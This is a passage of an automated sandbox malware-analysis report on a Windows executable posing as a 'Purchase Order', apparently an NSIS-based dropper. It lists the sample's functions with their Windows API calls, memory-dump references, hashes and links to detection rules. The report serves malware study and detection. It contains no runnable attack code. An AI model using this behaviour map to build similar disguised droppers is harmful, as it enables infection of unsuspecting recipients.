                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: PrivateProfileString
                                              • String ID:
                                              • API String ID: 1096422788-0
                                              • Opcode ID: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
                                              • Instruction ID: 3d6fae6e588f42459dd5c721a8c471f59e455a0f8de0d1d47597fcd0a09f6ae9
                                              • Opcode Fuzzy Hash: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
                                              • Instruction Fuzzy Hash: 68E04830804208AADF106FA1CE499AE3A64AF00341F144439F9957B0D1E6F8C4816745
                                              Function 00406127 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,0042C228,?,?,004061B5,0042C228,00000000,?,?,Call,?), ref: 0040614B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Open
                                              • String ID:
                                              • API String ID: 71445658-0
                                              • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                              • Instruction ID: b908bd292ce434c6339c018d18c1e3bfafdd2f7559b63d477f04a141d62eba1a
                                              • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                              • Instruction Fuzzy Hash: 94D0123214020DFBDF119E909D01FAB775DAB08350F014426FE06A9191D776D530AB14
                                              Function 00403347 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,?,0000000A), ref: 00403355
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                              • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                              • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                              • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                              Function 00404266 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,?,00000001,00404091), ref: 00404274
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                              • Instruction ID: 35ea918b965a0e533a09ef3704f79fc1997eb74e27ad0e26ff3c84f6d98ddf78
                                              • Opcode Fuzzy Hash: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                              • Instruction Fuzzy Hash: ACB0923A180600AADE118B40DE4AF857A62F7A4701F018138B240640B0CAB200E0DB48
                                              Function 004058E6 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                              Download Yara Rule
                                              APIs
                                              • ShellExecuteExW.SHELL32(?), ref: 004058F5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: ExecuteShell
                                              • String ID:
                                              • API String ID: 587946157-0
                                              • Opcode ID: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                              • Instruction ID: 322818d701d9cc3fc85427ca8463de8bac6637280c84b784c1803e53dd53602d
                                              • Opcode Fuzzy Hash: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                              • Instruction Fuzzy Hash: 55C092B2000200DFE301CF90CB08F067BF8AF59306F028058E1849A160C7788800CB69
                                              Function 00401F06 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00405322: lstrlenW.KERNEL32(0042C228,00000000,0041D800,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041D800,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                • Part of subcall function 00405322: lstrcatW.KERNEL32(0042C228,0040327A,0040327A,0042C228,00000000,0041D800,755723A0), ref: 0040537D
                                                • Part of subcall function 00405322: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                                • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                • Part of subcall function 004058A3: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 004058CC
                                                • Part of subcall function 004058A3: CloseHandle.KERNEL32(?), ref: 004058D9
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F4D
                                                • Part of subcall function 00406745: WaitForSingleObject.KERNEL32(?,?), ref: 00406756
                                                • Part of subcall function 00406745: GetExitCodeProcess.KERNEL32(?,?), ref: 00406778
                                                • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                              • String ID:
                                              • API String ID: 2972824698-0
                                              • Opcode ID: aaec09a509645010865dafd0abc3644c3bfecfb7619cc712dd1918ecd69f6dac
                                              • Instruction ID: 9073c6adce58ff193a4fc3832a7f1d33e0b572ffc6e746f3319226a0f770ccba
                                              • Opcode Fuzzy Hash: aaec09a509645010865dafd0abc3644c3bfecfb7619cc712dd1918ecd69f6dac
                                              • Instruction Fuzzy Hash: 24F0F0329090219BDB20FBA189885DE72A49F44318B2441BBF902B20D1CBBC0E409A6E

                                              Non-executed Functions

                                              Function 00405461 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDlgItem.USER32(?,00000403), ref: 004054BF
                                              • GetDlgItem.USER32(?,000003EE), ref: 004054CE
                                              • GetClientRect.USER32(?,?), ref: 0040550B
                                              • GetSystemMetrics.USER32(00000002), ref: 00405512
                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405533
                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405544
                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405557
                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405565
                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405578
                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040559A
                                              • ShowWindow.USER32(?,?), ref: 004055AE
                                              • GetDlgItem.USER32(?,?), ref: 004055CF
                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055DF
                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055F8
                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405604
                                              • GetDlgItem.USER32(?,?), ref: 004054DD
                                                • Part of subcall function 00404266: SendMessageW.USER32(?,?,00000001,00404091), ref: 00404274
                                              • GetDlgItem.USER32(?,?), ref: 00405621
                                              • CreateThread.KERNEL32(00000000,00000000,Function_000053F5,00000000), ref: 0040562F
                                              • CloseHandle.KERNEL32(00000000), ref: 00405636
                                              • ShowWindow.USER32(00000000), ref: 0040565A
                                              • ShowWindow.USER32(?,?), ref: 0040565F
                                              • ShowWindow.USER32(?), ref: 004056A9
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056DD
                                              • CreatePopupMenu.USER32 ref: 004056EE
                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405702
                                              • GetWindowRect.USER32(?,?), ref: 00405722
                                              • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 0040573B
                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405773
                                              • OpenClipboard.USER32(00000000), ref: 00405783
                                              • EmptyClipboard.USER32 ref: 00405789
                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405795
                                              • GlobalLock.KERNEL32(00000000), ref: 0040579F
                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004057B3
                                              • GlobalUnlock.KERNEL32(00000000), ref: 004057D3
                                              • SetClipboardData.USER32(0000000D,00000000), ref: 004057DE
                                              • CloseClipboard.USER32 ref: 004057E4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                              • String ID: {
                                              • API String ID: 590372296-366298937
                                              • Opcode ID: d79c0185c0728b850bacb0f939067e3749861c5126489aa4a3835004506ab0c2
                                              • Instruction ID: 0d33ea325d25f8e5d5623e6ebdd73ca6fcd7ab1b09301a5b30cdd6c49ec902ff
                                              • Opcode Fuzzy Hash: d79c0185c0728b850bacb0f939067e3749861c5126489aa4a3835004506ab0c2
                                              • Instruction Fuzzy Hash: D7B15770900608FFDB119FA0DD89AAE7BB9FB48355F00403AFA41BA1A0CB755E51DF68
                                              Function 00404722 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDlgItem.USER32(?,000003FB), ref: 00404771
                                              • SetWindowTextW.USER32(00000000,?), ref: 0040479B
                                              • SHBrowseForFolderW.SHELL32(?), ref: 0040484C
                                              • CoTaskMemFree.OLE32(00000000), ref: 00404857
                                              • lstrcmpiW.KERNEL32(Call,0042D248,00000000,?,?), ref: 00404889
                                              • lstrcatW.KERNEL32(?,Call), ref: 00404895
                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048A7
                                                • Part of subcall function 00405904: GetDlgItemTextW.USER32(?,?,?,004048DE), ref: 00405917
                                                • Part of subcall function 0040654E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",0040336A,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,?,0000000A), ref: 004065B1
                                                • Part of subcall function 0040654E: CharNextW.USER32(?,?,?,00000000,?,00000006,?,0000000A), ref: 004065C0
                                                • Part of subcall function 0040654E: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",0040336A,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,?,0000000A), ref: 004065C5
                                                • Part of subcall function 0040654E: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",0040336A,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,?,0000000A), ref: 004065D8
                                              • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 0040496A
                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404985
                                                • Part of subcall function 00404ADE: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                                • Part of subcall function 00404ADE: wsprintfW.USER32 ref: 00404B88
                                                • Part of subcall function 00404ADE: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                              • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps$Call
                                              • API String ID: 2624150263-3993347796
                                              • Opcode ID: 68aa07a1fe6bf47594d6bed69479b5c606ba263e933e44afd0ace3f0572c8061
                                              • Instruction ID: 9ce2ccc5872d7715d19bac2dec5c0444f9ce2fea2c0a51142092d54e0f15b7c0
                                              • Opcode Fuzzy Hash: 68aa07a1fe6bf47594d6bed69479b5c606ba263e933e44afd0ace3f0572c8061
                                              • Instruction Fuzzy Hash: F8A165B1A00208ABDB11AFA5CD45AAFB7B8EF84314F10847BF601B62D1D77C99418F6D
                                              Function 004072EC Relevance: 2.8, Strings: 2, Instructions: 300COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: p!C$p!C
                                              • API String ID: 0-3125587631
                                              • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                              • Instruction ID: 7c26ffe8835462b5285d43e9ad3b72979f058f3642fe5300250d3649f4ae0bba
                                              • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                              • Instruction Fuzzy Hash: 9BC15831E04219DBDF18CF68C8905EEBBB2BF88314F25866AC85677380D734A942CF95
                                              Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: FileFindFirst
                                              • String ID:
                                              • API String ID: 1974802433-0
                                              • Opcode ID: 1d203f80b4415f0f6344281a2a9e2fd09f6dd1f95b509643d07a0f28621ba8c6
                                              • Instruction ID: 0cd4a400be5c1b2ce6ea5bbb35e8853c3f48bcc8ff45a2cab7902aaadd26400c
                                              • Opcode Fuzzy Hash: 1d203f80b4415f0f6344281a2a9e2fd09f6dd1f95b509643d07a0f28621ba8c6
                                              • Instruction Fuzzy Hash: C8F08271A14104EFDB00EBA4DA499ADB378EF04314F6045BBF515F21D1DBB45D409B29
                                              Function 00406B15 Relevance: .3, Instructions: 334COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                              • Instruction ID: dcc2b246e3e85771245330633344c28aad3b6f2e7effc766acd5add5c88cb85a
                                              • Opcode Fuzzy Hash: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                              • Instruction Fuzzy Hash: DBE18A7190470ADFDB24CF99C880BAAB7F5FF44305F15852EE497A7291E378AA91CB04
                                              Function 004043F0 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040448E
                                              • GetDlgItem.USER32(?,?), ref: 004044A2
                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044BF
                                              • GetSysColor.USER32(?), ref: 004044D0
                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044DE
                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044EC
                                              • lstrlenW.KERNEL32(?), ref: 004044F1
                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044FE
                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404513
                                              • GetDlgItem.USER32(?,0000040A), ref: 0040456C
                                              • SendMessageW.USER32(00000000), ref: 00404573
                                              • GetDlgItem.USER32(?,?), ref: 0040459E
                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045E1
                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004045EF
                                              • SetCursor.USER32(00000000), ref: 004045F2
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0040460B
                                              • SetCursor.USER32(00000000), ref: 0040460E
                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040463D
                                              • SendMessageW.USER32(?,00000000,00000000), ref: 0040464F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
